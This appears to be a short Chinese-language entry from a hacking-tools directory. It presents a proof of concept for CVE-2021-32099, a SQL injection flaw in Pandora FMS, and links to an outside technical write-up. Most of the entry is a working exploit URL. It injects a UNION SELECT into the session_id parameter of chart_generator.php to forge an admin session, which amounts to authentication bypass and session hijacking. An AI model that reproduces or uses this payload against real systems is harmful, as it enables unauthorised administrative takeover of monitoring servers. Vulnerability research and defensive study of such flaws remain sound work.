黑客、渗透测试和网络安全工具,武装您的安全武器库!
CVE-2021-32099的概念验证漏洞利用程序,针对Pandora FMS中的SQL注入漏洞,演示了通过精心构造的UNION查询实现会话劫持。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
CVE-2021-32099
POC : http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
详情 : https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained